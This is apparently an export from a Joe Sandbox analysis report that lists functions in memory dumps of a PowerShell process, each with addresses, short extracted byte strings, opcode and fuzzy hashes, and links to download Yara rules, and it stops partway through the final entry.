Snapshot File: hcaresult_1_2_47d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42b13c3e742db22f41e09d1d002f3db928d556c2c7780f57aa83051e066ee679
Instruction ID: 44384df4e06cf32d6e181815c1df7e4b8b8c68a8ddf189f6c411af4641e9618b
Opcode Fuzzy Hash: 42b13c3e742db22f41e09d1d002f3db928d556c2c7780f57aa83051e066ee679
Instruction Fuzzy Hash: 6FB16D70E10209CFDF14CFA9D98579EBBF2BF88318F148529D81AA7354EB74A845CB91

Function 047DF8D0 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2128986233.00000000047D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_47d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77056339128cd81d34ebd0f7047c9f7ba33cccc1d060fe0d0177cd966382f432
Instruction ID: 0036c92159497208d91b56df41627af49ff21a169e8b46f7305ff7183846f9fd
Opcode Fuzzy Hash: 77056339128cd81d34ebd0f7047c9f7ba33cccc1d060fe0d0177cd966382f432
Instruction Fuzzy Hash: DCB16F70E10209DFDB14CFB9D89179DBBF2AF88318F148529D81AE7354EB74A885CB81

Function 07302C60 Relevance: 38.6, Strings: 30, Instructions: 1121COMMON

Download Yara Rule

Strings

tP^q, xrefs: 07302F44
4'^q, xrefs: 07303881
(fvl, xrefs: 073042F3
4'^q, xrefs: 07302DC5
(fvl, xrefs: 07303627
4'^q, xrefs: 0730455C
4'^q, xrefs: 07303875
(fvl, xrefs: 07303A51
(fvl, xrefs: 07303257
tP^q, xrefs: 07302F50
4'^q, xrefs: 073044DD
(fvl, xrefs: 073042E9
4'^q, xrefs: 07304550
(fvl, xrefs: 0730367F
(fvl, xrefs: 07303483
4'^q, xrefs: 073044D1
(fvl, xrefs: 07303424
-gk, xrefs: 07303C07
4'^q, xrefs: 07302DB9
(fvl, xrefs: 073031A5
(fvl, xrefs: 073039FC
(fvl, xrefs: 07303932
(fvl, xrefs: 073034DC
(fvl, xrefs: 07303928
-gk, xrefs: 073045E1
(fvl, xrefs: 0730358F
(fvl, xrefs: 07303261
x.gk, xrefs: 07303BB9
x.gk, xrefs: 0730459C
(fvl, xrefs: 0730319B

Memory Dump Source

Source File: 00000001.00000002.2134613809.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7300000_powershell.jbxd

Similarity

API ID:
String ID: (fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$x.gk$x.gk$-gk$-gk
API String ID: 0-2449872974
Opcode ID: c264a9c3a23ce04cf41ebbcdbda6c4d8c4beecd32a849b55a7eb00e759d43006
Instruction ID: 018f6cc320df91061b993d1209230705a0260b7c3994ed258ee2724a0f3cc24e
Opcode Fuzzy Hash: c264a9c3a23ce04cf41ebbcdbda6c4d8c4beecd32a849b55a7eb00e759d43006
Instruction Fuzzy Hash: EB92D9B0A00215DFE724DF69C950BAAB7B2BF85304F1084AED90D9BB95CB31ED45CB91

Function 0730C839 Relevance: 36.1, Strings: 28, Instructions: 1096COMMON

Download Yara Rule

Strings

x.gk, xrefs: 0730BB03
(fvl, xrefs: 0730C008
(fvl, xrefs: 0730C278
(fvl, xrefs: 0730C5DB
(fvl, xrefs: 0730C0D1
(fvl, xrefs: 0730CBAF
(fvl, xrefs: 0730C89C
(fvl, xrefs: 0730C4F2
(fvl, xrefs: 0730C220
(fvl, xrefs: 0730B623
(fvl, xrefs: 0730B6F3
tLhk, xrefs: 0730B603
-gk, xrefs: 0730BB51
(fvl, xrefs: 0730C93A
4'^q, xrefs: 0730B82C
(fvl, xrefs: 0730B9B9
(fvl, xrefs: 0730BA1F
(fvl, xrefs: 0730C580
(fvl, xrefs: 0730C994
-gk, xrefs: 0730C7A0
(fvl, xrefs: 0730CB4E
4'^q, xrefs: 0730B8D0
(fvl, xrefs: 0730CC1D
x.gk, xrefs: 0730C74F
(fvl, xrefs: 0730C073
4'^q, xrefs: 0730C448
(fvl, xrefs: 0730C182
tLhk, xrefs: 0730CBF9

Memory Dump Source

Source File: 00000001.00000002.2134613809.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7300000_powershell.jbxd

Similarity

API ID:
String ID: (fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$4'^q$4'^q$4'^q$tLhk$tLhk$x.gk$x.gk$-gk$-gk
API String ID: 0-2734191533
Opcode ID: aaef8439617684050832c0f144271ec02e1a7990be0a163fcc825c2ffb33ef30
Instruction ID: 91a68ad22a3ee85292c8f076497754948924a3e29d9490db9ebcc6ee4f6228a9
Opcode Fuzzy Hash: aaef8439617684050832c0f144271ec02e1a7990be0a163fcc825c2ffb33ef30
Instruction Fuzzy Hash: 92B280B4A002149FDB24DF64CD51BEABBB2BF88304F1085A9D9496B795CB31AD81CF91

Function 07303CA0 Relevance: 28.3, Strings: 22, Instructions: 804COMMON

Download Yara Rule

Strings

(fvl, xrefs: 07303D9A
(fvl, xrefs: 0730367F
(fvl, xrefs: 07303483
(fvl, xrefs: 07303FD5
(fvl, xrefs: 07303424
(fvl, xrefs: 0730403F
-gk, xrefs: 07303C07
(fvl, xrefs: 07303627
(fvl, xrefs: 073039FC
(fvl, xrefs: 073034DC
(fvl, xrefs: 07303928
(fvl, xrefs: 07303D00
4'^q, xrefs: 07303875
(fvl, xrefs: 07303A51
(fvl, xrefs: 0730358F
(fvl, xrefs: 073040C8
tLhk, xrefs: 07304108
(fvl, xrefs: 07304033
(fvl, xrefs: 07303FE3
x.gk, xrefs: 07303BB9
(fvl, xrefs: 07303DED
(fvl, xrefs: 073040BE

Memory Dump Source

Source File: 00000001.00000002.2134613809.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7300000_powershell.jbxd

Similarity

API ID:
String ID: (fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$4'^q$tLhk$x.gk$-gk
API String ID: 0-4038210868
Opcode ID: cad5a5fa7302717dca6a63ca2fb4fc6d6512d760ab4dbdcfb7202bd3937e0314
Instruction ID: ed9d03032b676ddc7b8ea7b6fef20a3c2d30c62956a8ec70b34f11f2fb43e6d9
Opcode Fuzzy Hash: cad5a5fa7302717dca6a63ca2fb4fc6d6512d760ab4dbdcfb7202bd3937e0314
Instruction Fuzzy Hash: A67271B0A00215DFE724DB68CD50BAAB7B2BF85304F1085ADD94D6BB91CB31AD85CF91

Function 07304AE0 Relevance: 20.9, Strings: 16, Instructions: 922COMMON

Download Yara Rule

Strings

4'^q, xrefs: 07304F41
4'^q, xrefs: 0730509D
4'^q, xrefs: 07304EA5
4'^q, xrefs: 07304FE9
4'^q, xrefs: 07304E99
4'^q, xrefs: 07305139
4'^q, xrefs: 07305091
4'^q, xrefs: 07304BEB
4'^q, xrefs: 07304DE8
4'^q, xrefs: 07305145
(fvl, xrefs: 07305782
(fvl, xrefs: 0730578C
4'^q, xrefs: 07304BDF
4'^q, xrefs: 07304DDC
4'^q, xrefs: 07304F4D
4'^q, xrefs: 07304FF5

Memory Dump Source

Source File: 00000001.00000002.2134613809.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7300000_powershell.jbxd

Similarity

API ID:
String ID: (fvl$(fvl$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
API String ID: 0-3858879470
Opcode ID: 2b19083c6ca6038a5e0deeeeb1fcf47c1d6dcdeafd497d5b4bf518399871c021
Instruction ID: f4a4846ffbe80aef656947ed5442b9defbe2f93c8e9b444a09c20e25d0d98a33
Opcode Fuzzy Hash: 2b19083c6ca6038a5e0deeeeb1fcf47c1d6dcdeafd497d5b4bf518399871c021
Instruction Fuzzy Hash: 95827CB0B402089FEB04CF98C954F9ABBB2BB89305F148469D9099F795CB72ED45CBD1

Function 07303000 Relevance: 18.2, Strings: 14, Instructions: 748COMMON

Download Yara Rule

Strings

(fvl, xrefs: 0730367F
(fvl, xrefs: 07303483
(fvl, xrefs: 07303424
-gk, xrefs: 07303C07
(fvl, xrefs: 07303627
(fvl, xrefs: 073039FC
(fvl, xrefs: 073034DC
(fvl, xrefs: 07303928
4'^q, xrefs: 07303875
(fvl, xrefs: 07303A51
(fvl, xrefs: 0730358F
(fvl, xrefs: 07303257
x.gk, xrefs: 07303BB9
(fvl, xrefs: 0730319B

Memory Dump Source

Source File: 00000001.00000002.2134613809.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7300000_powershell.jbxd

Similarity

API ID:
String ID: (fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$4'^q$x.gk$-gk
API String ID: 0-1968180177
Opcode ID: dfe9f3b1086c93ad0ab034d46ef06d17d73623b74311bfc9574908cbe548d61f
Instruction ID: 5c0ce2ec768754ed3dfd3fca4e693cee950ffc182ff20e032e3a55777f38be13
Opcode Fuzzy Hash: dfe9f3b1086c93ad0ab034d46ef06d17d73623b74311bfc9574908cbe548d61f
Instruction Fuzzy Hash: 066292B0A00215DFE724DF68C950B9AB7B2BF85304F1085AED94D6BB95CB31AD81CF91

Function 07303E58 Relevance: 15.6, Strings: 12, Instructions: 562COMMON

Download Yara Rule

Strings

(fvl, xrefs: 0730367F
(fvl, xrefs: 07303483
4'^q, xrefs: 07303875
(fvl, xrefs: 07303A51
(fvl, xrefs: 07303424
(fvl, xrefs: 0730358F
-gk, xrefs: 07303C07
(fvl, xrefs: 07303627
(fvl, xrefs: 073039FC
x.gk, xrefs: 07303BB9
(fvl, xrefs: 073034DC
(fvl, xrefs: 07303928

Memory Dump Source

Source File: 00000001.00000002.2134613809.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7300000_powershell.jbxd

Similarity

API ID:
String ID: (fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$4'^q$x.gk$-gk
API String ID: 0-2663718287
Opcode ID: 08e927bb2895a5203cfd269a110850e75d6430f62db6d2bdc1551c32ed44e8be
Instruction ID: 9695dc2a6daf34b4caa90e5f939662092d16ecbf1f6e5e329d7b83688bb75246
Opcode Fuzzy Hash: 08e927bb2895a5203cfd269a110850e75d6430f62db6d2bdc1551c32ed44e8be
Instruction Fuzzy Hash: 4D3260B0A002159FEB24DB68CD50F9AB7B2BF84304F1085ADD94D6BB95CB31AD85CF91

Function 0730CA03 Relevance: 15.5, Strings: 12, Instructions: 538COMMON

Download Yara Rule

Strings

(fvl, xrefs: 0730C4F2
(fvl, xrefs: 0730C008
(fvl, xrefs: 0730C220
(fvl, xrefs: 0730C580
x.gk, xrefs: 0730C74F
(fvl, xrefs: 0730C278
(fvl, xrefs: 0730C073
-gk, xrefs: 0730C7A0
(fvl, xrefs: 0730C5DB
4'^q, xrefs: 0730C448
(fvl, xrefs: 0730C0D1
(fvl, xrefs: 0730C182

Memory Dump Source

Source File: 00000001.00000002.2134613809.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7300000_powershell.jbxd

Similarity

API ID:
String ID: (fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$4'^q$x.gk$-gk
API String ID: 0-2663718287
Opcode ID: 0d9cae3aa234ff798f9e2adda6e15985ec159390d2a7b2adad4b72897fbd27f0
Instruction ID: c51bebf54623697aa418e8c14643936cda4186ab47e152e9a3758b5c4b5763c8
Opcode Fuzzy Hash: 0d9cae3aa234ff798f9e2adda6e15985ec159390d2a7b2adad4b72897fbd27f0
Instruction Fuzzy Hash: F33292B4A002149FDB24DB64CD51BDAB7B2BF88704F1085A9D9496B791CB31ED81CF91

Function 0730CC98 Relevance: 11.7, Strings: 9, Instructions: 435COMMON

Download Yara Rule

Strings

(fvl, xrefs: 0730D324
(fvl, xrefs: 0730CE20
(fvl, xrefs: 0730D1B2
tLhk, xrefs: 0730CE86
4'^q, xrefs: 0730CF0D
x.gk, xrefs: 0730D441
(fvl, xrefs: 0730D018
(fvl, xrefs: 0730CD12
4sl, xrefs: 0730CD60

Memory Dump Source

Source File: 00000001.00000002.2134613809.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7300000_powershell.jbxd

Similarity

API ID:
String ID: (fvl$(fvl$(fvl$(fvl$(fvl$4'^q$4sl$tLhk$x.gk
API String ID: 0-109863372
Opcode ID: 5a07d19fdef48425bdcdb357c162b6938a15bab0ce0837d720d6fa7fb481923c
Instruction ID: 04282bbe16458935c87bc73d000d6df8e868b1003396abe0b6c616e221e5c065
Opcode Fuzzy Hash: 5a07d19fdef48425bdcdb357c162b6938a15bab0ce0837d720d6fa7fb481923c
Instruction Fuzzy Hash: 71124DF0A10219DFEB64CB64C960BE9B7B6BB45304F0085E9D54DAB790DB31AE81CF91

Function 0730CA8D Relevance: 11.7, Strings: 9, Instructions: 431COMMON

Download Yara Rule

Strings

(fvl, xrefs: 0730D324
(fvl, xrefs: 0730CE20
(fvl, xrefs: 0730D1B2
tLhk, xrefs: 0730CE86
4'^q, xrefs: 0730CF0D
x.gk, xrefs: 0730D441
(fvl, xrefs: 0730D018
(fvl, xrefs: 0730CD12
4sl, xrefs: 0730CD60

Memory Dump Source

Source File: 00000001.00000002.2134613809.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7300000_powershell.jbxd

Similarity

API ID:
String ID: (fvl$(fvl$(fvl$(fvl$(fvl$4'^q$4sl$tLhk$x.gk
API String ID: 0-109863372
Opcode ID: 3a6707e9952b188ce62ce9ce7929884db7914bcb7972d6d42c01051eb69d4bb2
Instruction ID: 229986ca780e35ab4e5fe885f56a74fb33ee771cf8dd03d78de158622beafbaa
Opcode Fuzzy Hash: 3a6707e9952b188ce62ce9ce7929884db7914bcb7972d6d42c01051eb69d4bb2
Instruction Fuzzy Hash: 98122CB0A10219DFEB64CF64C960BE9B7B6BB45304F0085E9D54DABB90DB31AD81CF91

Function 07304AC2 Relevance: 9.5, Strings: 7, Instructions: 736COMMON

Download Yara Rule

Strings

4'^q, xrefs: 07305091
4'^q, xrefs: 07304F41
4'^q, xrefs: 07304BDF
4'^q, xrefs: 07304FE9
4'^q, xrefs: 07304DDC
4'^q, xrefs: 07304E99
4'^q, xrefs: 07305139

Memory Dump Source

Source File: 00000001.00000002.2134613809.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7300000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
API String ID: 0-3435395042
Opcode ID: 2433d4948d24f774f75ec30479ca2d1935b8423a8894f37dc7eb16a801524a65
Instruction ID: 99e7012acdc32f7b0b01336dad5fefb9935b9f2c9b631d930d502eac2a0ce88a
Opcode Fuzzy Hash: 2433d4948d24f774f75ec30479ca2d1935b8423a8894f37dc7eb16a801524a65
Instruction Fuzzy Hash: 7D627CB4A002049FEB04CF98C855F9ABBB2FB89305F148459E9096F796CB72ED45CBD1

Function 07300778 Relevance: 6.5, Strings: 5, Instructions: 236COMMON

Download Yara Rule

Strings

$^q, xrefs: 073007F3
$^q, xrefs: 073007E7
$^q, xrefs: 073007CB
4'^q, xrefs: 0730080C
4'^q, xrefs: 07300818

Memory Dump Source

Source File: 00000001.00000002.2134613809.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7300000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q$$^q
API String ID: 0-3272787073
Opcode ID: a61ab4ec38eeb8243f4809b2e3bc5543f8243ec711e1594479fa2b83c6f937b4
Instruction ID: c01cdb254bdcd806204219ec69e6d7217a18f52c4064934a233a33e9f65073bf
Opcode Fuzzy Hash: a61ab4ec38eeb8243f4809b2e3bc5543f8243ec711e1594479fa2b83c6f937b4
Instruction Fuzzy Hash: 8C714CB1B002158FEB189F7984203BABBE5EF85710F14847AD81DDB691EB36C945CBE1

Function 07303EA7 Relevance: 6.4, Strings: 5, Instructions: 168COMMON

Download Yara Rule

Strings

h2ik, xrefs: 07303EEF
(fvl, xrefs: 07303FD5
tLhk, xrefs: 07304108
(fvl, xrefs: 07304033
(fvl, xrefs: 073040BE

Memory Dump Source

Source File: 00000001.00000002.2134613809.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7300000_powershell.jbxd

Similarity

API ID:
String ID: (fvl$(fvl$(fvl$h2ik$tLhk
API String ID: 0-1617002787
Opcode ID: e0b8625b5b93bf1910aa4b8a8a9b81725c62a1273b8c3418ce854b1cd927e4d6
Instruction ID: 6f408a0e51015ddad958d447f35c05d8cb6a9a5a15e82bc8f496880fb57e2c1a
Opcode Fuzzy Hash: e0b8625b5b93bf1910aa4b8a8a9b81725c62a1273b8c3418ce854b1cd927e4d6
Instruction Fuzzy Hash: F761B9F0A01255DFEB24CF68C950BA9B7B6BF45304F1084A9DA0D6B791CA319E45CB92

Function 07309020 Relevance: 5.6, Strings: 4, Instructions: 589COMMON

Download Yara Rule

Strings

4'^q, xrefs: 073094B8
4'^q, xrefs: 073094C2
4'^q, xrefs: 0730935E
4'^q, xrefs: 07309368

Memory Dump Source

Source File: 00000001.00000002.2134613809.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7300000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q
API String ID: 0-1420252700
Opcode ID: 0fe3a857047336a5e43bdf124e8ec71472905fc066bc128af9802466c478cab4
Instruction ID: 85259217e11bb26bea48f0f7e885534f4da1556e1a7c22c9e87833a39f53cb49
Opcode Fuzzy Hash: 0fe3a857047336a5e43bdf124e8ec71472905fc066bc128af9802466c478cab4
Instruction Fuzzy Hash: 22126CF17042158FDB148B7999217AABBA6AFC1310F1480BAD409CF6D3DB32E845C7E2

Function 047DB508 Relevance: 4.3, Strings: 3, Instructions: 522COMMON

Download Yara Rule

Strings

$^q, xrefs: 047DBA87
$^q, xrefs: 047DB722
Hbq, xrefs: 047DB5CE

Memory Dump Source

Source File: 00000001.00000002.2128986233.00000000047D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_47d0000_powershell.jbxd

Similarity

API ID:
String ID: Hbq$$^q$$^q
API String ID: 0-1611274095
Opcode ID: 6a26f990dc992986a135fec1fdc7c760f680a6bff9f20d2798200579d910fc98
Instruction ID: 830d5fed2716010ffdbc0822f9932fe004e15518f2ec07fcf8cb79661fadbd6e
Opcode Fuzzy Hash: 6a26f990dc992986a135fec1fdc7c760f680a6bff9f20d2798200579d910fc98
Instruction Fuzzy Hash: B8223F34B102148FCB29EB65C8547AEBBB2BF89304F1544A9D40AAB365DF35ED85CF90

Function 07300F18 Relevance: 3.8, Strings: 3, Instructions: 94COMMON

Download Yara Rule

Strings

$^q, xrefs: 07300F74
$^q, xrefs: 07300F80
$^q, xrefs: 07300F2A

Memory Dump Source

Source File: 00000001.00000002.2134613809.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7300000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q
API String ID: 0-831282457
Opcode ID: aa06faba0803f1012790d0a450b1c22b7e276e9b5db016037f9ba16ce9241610
Instruction ID: 7c66267e5fd7ec2858b7d33e79b8babfb0ab24a0240b03bfb2f872203977014b
Opcode Fuzzy Hash: aa06faba0803f1012790d0a450b1c22b7e276e9b5db016037f9ba16ce9241610
Instruction Fuzzy Hash: D52147F27112065FEB28597E9CA0B27B6DA6BC0B15F24843AA50DCB7C5CD36C844A3E1

Function 07301040 Relevance: 3.0, Strings: 2, Instructions: 499COMMON

Download Yara Rule

Strings

tP^q, xrefs: 073010D7
tP^q, xrefs: 073010CB

Memory Dump Source

Source File: 00000001.00000002.2134613809.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7300000_powershell.jbxd

Similarity

API ID:
String ID: tP^q$tP^q
API String ID: 0-309238000
Opcode ID: 3632f1283569b9dad557251452dd5ed1bf6d448b52326e749343bd421ef0ae2a
Instruction ID: c6e202dde88ec1dd37c2ea577f1c0277a76c7a649668902cd6be67fe262f5a85
Opcode Fuzzy Hash: 3632f1283569b9dad557251452dd5ed1bf6d448b52326e749343bd421ef0ae2a
Instruction Fuzzy Hash: D612B1B4B00209DFE714CBA8C955AAEBBF2BB85314F14C069E9099F795CA32DC45CBD1

Function 07300A80 Relevance: 2.7, Strings: 2, Instructions: 172COMMON

Download Yara Rule

Strings

tP^q, xrefs: 07300B24
tP^q, xrefs: 07300B30

Memory Dump Source

Source File: 00000001.00000002.2134613809.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7300000_powershell.jbxd

Similarity

API ID:
String ID: tP^q$tP^q
API String ID: 0-309238000
Opcode ID: e42dd25b8899e3b39b605ccb42350bebd30b90129943b47a14088cb440bc1ce6
Instruction ID: 8bc4484ece3ca11ba2d4ee3043638ecc49a3079e71712818002eff3cdffb1a2f
Opcode Fuzzy Hash: e42dd25b8899e3b39b605ccb42350bebd30b90129943b47a14088cb440bc1ce6
Instruction Fuzzy Hash: BF5179B17043459FEB284A69982476ABFA6AFC2311F14C07BE54DDF2D1DA31C845C3E1

Function 07300EFC Relevance: 2.6, Strings: 2, Instructions: 81COMMON

Download Yara Rule

Strings

$^q, xrefs: 07300F74
$^q, xrefs: 07300F2A

Memory Dump Source

Source File: 00000001.00000002.2134613809.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7300000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: e6f0615448807a63fe19284b4c1559db5300a63facb84d11d6677857361c8108
Instruction ID: b36c21e281ed8bf46c055e70d1fbf436b9f808aa15357d273b38a7aad5972da4
Opcode Fuzzy Hash: e6f0615448807a63fe19284b4c1559db5300a63facb84d11d6677857361c8108
Instruction Fuzzy Hash: 3E213BF26093866FF729053A48A0B627FA55F82710F1840A7E98CCF5D7C9399848D3F6

Function 0730566E Relevance: 1.4, Strings: 1, Instructions: 139COMMON

Download Yara Rule

Strings

(fvl, xrefs: 07305782

Memory Dump Source

Source File: 00000001.00000002.2134613809.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7300000_powershell.jbxd

Similarity

API ID:
String ID: (fvl
API String ID: 0-905518172
Opcode ID: 1b90903a2238f7adc112d2be6afc4a98f57e4456ec739fbbbf2d9fb17fc164f4
Instruction ID: fb2ee603be5ca0d6b540a9606bd4b608fb4f655e100230cb6f0d40f0e6865535
Opcode Fuzzy Hash: 1b90903a2238f7adc112d2be6afc4a98f57e4456ec739fbbbf2d9fb17fc164f4
Instruction Fuzzy Hash: D15199B0A00208DFE714CF98C564FAABBB2BB45304F148469D9099F7A5CB31EE49CF91

Function 07304668 Relevance: 1.4, Strings: 1, Instructions: 102COMMON

Download Yara Rule

Strings

x.gk, xrefs: 0730471A

Memory Dump Source

Source File: 00000001.00000002.2134613809.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7300000_powershell.jbxd

Similarity

API ID:
String ID: x.gk
API String ID: 0-1304459573
Opcode ID: 9c093174fa7c647808204a93303d09c50115fcdf865286f33c44906b7de89adc
Instruction ID: bb44ec4757df93980be80bc420b117cbfe7f81d2525a05e05b342c02f59c0dd6
Opcode Fuzzy Hash: 9c093174fa7c647808204a93303d09c50115fcdf865286f33c44906b7de89adc
Instruction Fuzzy Hash: 7831D2B0B40104ABE704EB68C955FAF7AA3FB85700F108468E9016F795CF769D45CBE1

Function 07301174 Relevance: .3, Instructions: 332COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2134613809.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7300000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70d038a5b1db2c98afb288a468c70cfeaff41a42698c3a23f0204f50045bbf63
Instruction ID: 779a7fbd9343bfb17282c0a1bf4f1e2ed868f316469352366be84052623f116e
Opcode Fuzzy Hash: 70d038a5b1db2c98afb288a468c70cfeaff41a42698c3a23f0204f50045bbf63
Instruction Fuzzy Hash: 4BD16BB4A00209DFEB14CF58C5A0EADBBF2BB89314F14C059E909AB795C772EC45CB91

Function 047D72A8 Relevance: .3, Instructions: 313COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2128986233.00000000047D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_47d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c471c04d65efb1c71537f09fa961b8c11b972b09fda565ca76ccd147399c6023
Instruction ID: d6a3d7a58f8bc9b2f19ef55a113d2897a0bb700274e832a1791cc152a39be4c8
Opcode Fuzzy Hash: c471c04d65efb1c71537f09fa961b8c11b972b09fda565ca76ccd147399c6023
Instruction Fuzzy Hash: DDC1A035A102088FCB18DFA9C944AADBBB6FF84314F158569E406AB365DB74FD49CB80

Function 047DAED8 Relevance: .3, Instructions: 296COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2128986233.00000000047D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_47d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 038d0d18f047a5eb7761c88a8f010611ccab7d7083a740e967b0f10c8e41f393
Instruction ID: ff97534fe3b832a630cec53a493279bf575689249d550d93405b986fd1fe7b28
Opcode Fuzzy Hash: 038d0d18f047a5eb7761c88a8f010611ccab7d7083a740e967b0f10c8e41f393
Instruction Fuzzy Hash: F6C10774A10208DFCB15CFA8D584A9DBBB2FF88310F258569E805AB365D775EC81CB90

Function 047DEFF5 Relevance: .3, Instructions: 277COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2128986233.00000000047D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_47d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 692771b7e29709c327537bad62795a92d3b398c415c31609573758c85b41fe90
Instruction ID: b55916fed0489c38e1329bfadc1e85c8a93ebfcc563aafe40b5eb43ee005071e
Opcode Fuzzy Hash: 692771b7e29709c327537bad62795a92d3b398c415c31609573758c85b41fe90
Instruction Fuzzy Hash: 1EB15C70E10209DFDB10CFA9D98579EBBF1BF48318F148529D81AAB354EB74A846CF91

Function 047DF8C5 Relevance: .3, Instructions: 262COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2128986233.00000000047D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_47d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f23b2ce2617ba12208064c73126bd0d04a5482a64334358a8e08b81c079b7790
Instruction ID: 009f2492dbdefb6ddc2ef480169de6f7123e81a91d6bd989eb4c2c260e4d7c27
Opcode Fuzzy Hash: f23b2ce2617ba12208064c73126bd0d04a5482a64334358a8e08b81c079b7790
Instruction Fuzzy Hash: A1B17D70E10209DFDB10CFA9D99179DBBF1AF88318F148529D85AEB354EB74A885CF81

Function 047D7A70 Relevance: .2, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

